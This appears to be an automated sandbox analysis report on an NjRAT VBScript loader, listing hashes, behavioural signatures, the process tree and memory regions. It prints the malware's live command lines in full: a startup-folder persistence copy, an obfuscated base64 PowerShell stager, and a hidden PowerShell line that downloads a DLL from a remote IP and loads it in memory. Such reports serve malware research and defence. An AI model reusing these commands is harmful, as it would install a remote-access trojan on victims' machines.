Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
26-01-2022 08:53
Static task
static1
Behavioral task
behavioral1
Sample
NJRATCASA22.vbs
Resource
win7-en-20211208
General
-
Target
NJRATCASA22.vbs
-
Size
330KB
-
MD5
8a4f7794001fbe25ab1820e9a66db1da
-
SHA1
fd1e5582b21480d6d19b247fe71f96d500314038
-
SHA256
6cbb94dab89d523749b578de2590ad064049c0574476f553df9ffcf9d13ddf51
-
SHA512
dd5305d5613314d78972169320971021e9d98af6c7cc5b2cb494996fe275cea87ad9aa9cd4f0109b482e6bb45b88f1fedf557c82925c68b152c7da110a292751
Malware Config
Extracted
http://192.99.190.34/dll/1.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1056 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1464 powershell.exe 588 powershell.exe 1056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1464 powershell.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 1056 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.execmd.exepowershell.exedescription pid process target process PID 792 wrote to memory of 1500 792 WScript.exe cmd.exe PID 792 wrote to memory of 1500 792 WScript.exe cmd.exe PID 792 wrote to memory of 1500 792 WScript.exe cmd.exe PID 1500 wrote to memory of 320 1500 cmd.exe PING.EXE PID 1500 wrote to memory of 320 1500 cmd.exe PING.EXE PID 1500 wrote to memory of 320 1500 cmd.exe PING.EXE PID 1500 wrote to memory of 1464 1500 cmd.exe powershell.exe PID 1500 wrote to memory of 1464 1500 cmd.exe powershell.exe PID 1500 wrote to memory of 1464 1500 cmd.exe powershell.exe PID 792 wrote to memory of 588 792 WScript.exe powershell.exe PID 792 wrote to memory of 588 792 WScript.exe powershell.exe PID 792 wrote to memory of 588 792 WScript.exe powershell.exe PID 588 wrote to memory of 1056 588 powershell.exe powershell.exe PID 588 wrote to memory of 1056 588 powershell.exe powershell.exe PID 588 wrote to memory of 1056 588 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\NJRATCASA22.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ DLW.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DE⁂OQ⁂y⁂C4⁂OQ⁂5⁂C4⁂MQ⁂5⁂D⁂⁂Lg⁂z⁂DQ⁂LwBk⁂Gw⁂b⁂⁂v⁂DE⁂LgB0⁂Hg⁂d⁂⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂EM⁂b⁂Bh⁂HM⁂cwBM⁂Gk⁂YgBy⁂GE⁂cgB5⁂DM⁂LgBD⁂Gw⁂YQBz⁂HM⁂MQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂TwBI⁂Ho⁂Uw⁂n⁂Ck⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂WwBv⁂GI⁂agBl⁂GM⁂d⁂Bb⁂F0⁂XQ⁂g⁂Cg⁂JwB0⁂Hg⁂d⁂⁂u⁂EE⁂UwBB⁂EM⁂M⁂⁂y⁂CU⁂V⁂BB⁂FI⁂SgBO⁂D⁂⁂Mg⁂l⁂DQ⁂Ng⁂w⁂DI⁂JQBl⁂HM⁂YQBi⁂C8⁂VwBF⁂E4⁂YQBz⁂GE⁂QwBj⁂HQ⁂YQBy⁂Eo⁂Tg⁂v⁂Gc⁂cgBv⁂C4⁂NQB1⁂GU⁂LgBh⁂HM⁂cwBh⁂GM⁂d⁂Bh⁂HI⁂agBu⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://192.99.190.34/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('OHzS').Invoke($null, [object[]] ('txt.ASAC02%TARJN02%4602%esab/WENasaCctarJN/gro.5ue.assactarjn//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
b6ecc4bda7a591cd3aee439b56c01304
SHA1fcc98c94aada74e6d199fb16ec258edf7a70737d
SHA25648fd458780744446e033b792086341450adbc36312dbf6da4ac28d7b4ae94ecc
SHA512e8017731ae49d9e4090c8a1ac264255f9997052ff46b6387536cbe5827d1e07a5c38c3ac83fc1c4b84e248791b28f53c8fc8606978759a08e7c13ecab7c8079d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
b6ecc4bda7a591cd3aee439b56c01304
SHA1fcc98c94aada74e6d199fb16ec258edf7a70737d
SHA25648fd458780744446e033b792086341450adbc36312dbf6da4ac28d7b4ae94ecc
SHA512e8017731ae49d9e4090c8a1ac264255f9997052ff46b6387536cbe5827d1e07a5c38c3ac83fc1c4b84e248791b28f53c8fc8606978759a08e7c13ecab7c8079d
-
memory/588-63-0x00000000027B0000-0x00000000027B2000-memory.dmpFilesize
8KB
-
memory/588-70-0x00000000027BB000-0x00000000027DA000-memory.dmpFilesize
124KB
-
memory/588-66-0x000000001B730000-0x000000001BA2F000-memory.dmpFilesize
3.0MB
-
memory/588-62-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmpFilesize
11.4MB
-
memory/588-64-0x00000000027B2000-0x00000000027B4000-memory.dmpFilesize
8KB
-
memory/588-65-0x00000000027B4000-0x00000000027B7000-memory.dmpFilesize
12KB
-
memory/792-54-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmpFilesize
8KB
-
memory/1056-69-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmpFilesize
11.4MB
-
memory/1056-71-0x0000000002720000-0x0000000002722000-memory.dmpFilesize
8KB
-
memory/1056-72-0x0000000002722000-0x0000000002724000-memory.dmpFilesize
8KB
-
memory/1056-73-0x0000000002724000-0x0000000002727000-memory.dmpFilesize
12KB
-
memory/1056-74-0x000000000272B000-0x000000000274A000-memory.dmpFilesize
124KB
-
memory/1464-56-0x000007FEF3820000-0x000007FEF437D000-memory.dmpFilesize
11.4MB
-
memory/1464-59-0x0000000002440000-0x00000000024C0000-memory.dmpFilesize
512KB
-
memory/1464-58-0x0000000002440000-0x00000000024C0000-memory.dmpFilesize
512KB
-
memory/1464-57-0x0000000002440000-0x00000000024C0000-memory.dmpFilesize
512KB